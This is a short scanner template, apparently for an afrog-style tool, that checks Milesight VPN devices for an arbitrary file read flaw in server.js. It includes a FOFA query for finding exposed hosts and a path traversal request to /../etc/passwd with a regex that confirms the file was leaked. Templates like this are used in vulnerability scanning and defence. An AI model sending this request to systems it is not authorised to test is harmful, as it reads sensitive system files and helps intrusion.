漏洞描述
FOFA: app="Milesight-VPN"
id: milesight-vpn-serverjs-fileread
info:
name: Milesight VPN server.js 任意文件读取漏洞
author: zan8in
severity: high
verified: true
description: |
FOFA: app="Milesight-VPN"
tags: milesight,fileread
created: 2023/09/03
rules:
r0:
request:
method: GET
path: /../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()